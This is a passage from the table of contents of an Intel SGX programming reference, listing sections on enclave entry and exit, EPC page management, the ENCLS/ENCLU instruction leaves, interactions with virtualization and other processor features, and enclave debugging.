. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2 3.1.2 EINIT Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2 3.2 Enclave Entry and Exiting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3 3.2.1 Synchronous Entry and Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-3 iv Ref. #329298-001 3.2.2 Asynchronous Enclave Exit (AEX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3 3.2.3 Resuming Execution after AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.2.3.1 ERESUME Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3 Calling Enclave Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.1 Calling Convention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.2 Register Preservation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.3 Returning to Caller. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5 3.4 SGX Key and Attestation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5 3.5 EPC and Management of EPC Pages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.1 EPC Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.2 OS Management of EPC Pages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.3 Eviction of Enclave Pages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-7 3.5.4 Loading an Enclave Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-7 3.5.5 Eviction of an SECS Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.5.6 Eviction of a Version Array Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6 Changes to Instruction Behavior Inside an Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6.1 Illegal Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6.2 RDRAND and RDSEED Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.3 PAUSE Instruction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.4 INT 3 Behavior Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.5 INVD Handling when Enclaves Are Enabled . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 CHAPTER 4 ENCLAVE EXITING EVENTS 4.1 Compatible Switch to the Exiting Stack of AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-1 4.2 State Saving by AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-2 4.3 Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-3 4.3.1 Processor Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-3 4.3.2 Synthetic State for Extended Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-4 4.3.3 VMCS Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-4 4.4 AEX Flow. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-5 4.4.1 AEX Operational Detail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-5 CHAPTER 5 INSTRUCTION REFERENCES 5.1 SGX InstructIon Syntax and Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1 5.1.1 ENCLS Register Usage Summary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1 5.1.2 ENCLU Register Usage Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-2 5.1.3 Information and Error Codes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-2 5.1.4 Internal CREGs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-3 5.1.5 Concurrent Operation Restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-3 5.1.5.1 Concurrency Restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-4 5.2 SGX InstructIon Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-5 ENCLS—Execute an Enclave System Function of Specified Leaf Number . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-6 ENCLU—Execute an Enclave User Function of Specified Leaf Number. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-8 5.3 SGX System Leaf Function Reference. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-11 EADD—Add a Page to an Uninitialized Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-12 EBLOCK—Mark a page in EPC as Blocked . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-16 ECREATE—Create an SECS page in the Enclave Page Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19 EDBGRD—Read From a Debug Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-23 EDBGWR—Write to a Debug Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-26 EEXTEND—Extend Uninitialized Enclave Measurement by 256 Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-29 EINIT—Initialize an Enclave for Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-32 ELDB/ELDU—Load an EPC page and Marked its State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-38 EPA—Add Version Array . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-42 EREMOVE—Remove a page from the EPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-44 ETRACK—Activates EBLOCK Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-47 EWB—Invalidate an EPC Page and Write out to Main Memory. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-49 5.4 SGX User Leaf Function Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-53 Ref. #329298-001 v 5.4.1 Instruction Column in the Instruction Summary Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-53 EENTER—Enters an Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-54 EEXIT—Exits an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-61 EGETKEY—Retrieves a Cryptographic Key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-64 EREPORT—Create a Cryptographic Report of the Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-71 ERESUME—Re-Enters an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-75 CHAPTER 6 SGX INTERACTIONS WITH IA32 AND INTEL 64 ARCHITECTURE 6.1 SGX Availability in Various Processor Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.2 IA32_FEATURE_CONTROL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.3 Interactions with Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.3.1 Scope of Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1 6.3.2 Interactions of SGX Instructions with Instruction Prefixes and Addressing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1 6.3.3 Interaction of SGX Instructions with Segmentation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-2 6.3.4 Interactions of Enclave Execution with Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-2 6.4 Interactions with Paging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-2 6.5 Interactions with VMX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-2 6.5.1 Availability of SGX under VMX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.2 Setting of CR4.SEE Bit under VMX Operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.3 VMM Controls on Exposing SGX to the Guest. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.4 VMX Capability Enumeration MSRs and SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.1 Guest State Area - Guest Non-Register State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.2 VM-Execution Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.3 Basic Exit Reasons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.5 VM Exits While Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.6 VM Entry Consistency Checks and SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.7 VM Execution Control Setting Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.8 Guest Interruptibility State Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.9 Interaction of SGX with Various VMMs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.10 Interactions with EPTs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.11 Interactions with APIC Virtualization. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.12 Interactions with Monitor Trap Flag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.6 SGX Interactions with Architecturally-visible Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-7 6.7 Interactions with the XSAVE/XRSTOR Processor Extended States . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-7 6.7.1 Requirements and Architecture Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-7 6.7.2 Relevant Fields in Various Data Structures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.1 SECS.ATTRIBUTES.XFRM. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.2 SECS.SSAFRAMESIZE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.3 XSAVE Area in SSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.3 Processor Extended States and ENCLS[ECREATE] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4 Processor Extended States and ENCLU[EENTER] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4.1 Fault Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4.2 State Loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5 Processor Extended States and AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5.1 State Saving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5.2 State Synthesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6 Processor Extended States and ENCLU[ERESUME] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6.1 Fault Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6.2 State Loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.7 Processor Extended States and ENCLU[EEXIT] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8 Interactions with SMM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8.1 Availability of SGX instructions in SMM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8.2 SMI while Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.8.3 SMRAM Synthetic State of AEX Triggered by SMI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.9 Interactions of INIT, SIPI, and Wait-for-SIPI with SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.10 Interactions with DMA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11 Interactions with Memory Configuration and Various Memory Ranges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.1 Memory Type Considerations for PRMRR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2 Interactions of PRMRR with Various Memory Regions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 vi Ref. #329298-001 6.11.2.1 Interactions of PRMRR with SMRR. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2.2 Interactions of PRMRR with MTRRs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2.3 Interactions of PRMRR with MMIO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.2.4 Interactions of PRMRR with IA32_APIC_BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.3 Interactions of PRMRR with Virtual APIC Page. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.3.1 Interactions of PRMRR with Physical Memory Accesses. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.4 Interactions of SGX with APIC Access Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12 Interactions with TXT. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12.1 Enclaves Created Prior to Execution of GETSEC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12.2 Interaction of GETSEC with SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.13 Interactions with Caching of Linear-address Translations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.14 Interactions with Intel® Transactional Synchronization Extensions (Intel® TSX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.14.1 HLE and RTM Debug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.15 SGX Interactions with S states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16 SGX Interactions with Machine Check Architecture (MCA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.1 Interactions with MCA Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.2 Machine Check Enables (IA32_MCi_CTL). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.3 CR4.MCE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-16 CHAPTER 7 ENCLAVE CODE DEBUG AND PROFILING 7.1 Configuration and Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.1.1 Debug Enclave vs. Production Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.1.2 Tool-chain Opt-in . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.2 Single Step Debug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.2.1 Single Stepping Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.2.2 Single Stepping ENCLS Instruction Leafs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.3 Single Stepping ENCLU Instruction Leafs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.4 Single-stepping Enclave Entry with Opt-out Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.4.1 Single Stepping without AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.4.2 Single Step Preempted by AEX due to Non-SMI Event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-3 7.2.5 RFLAGS.TF Treatment on AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-3 7.2.6 Restriction on Setting of TF after an Opt-out Entry. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-3 7.2.7 Trampoline Code Considerations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3 Code and Data Breakpoints. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.1 Breakpoint Suppression . . . . . . . . . . . . . . . . . . . 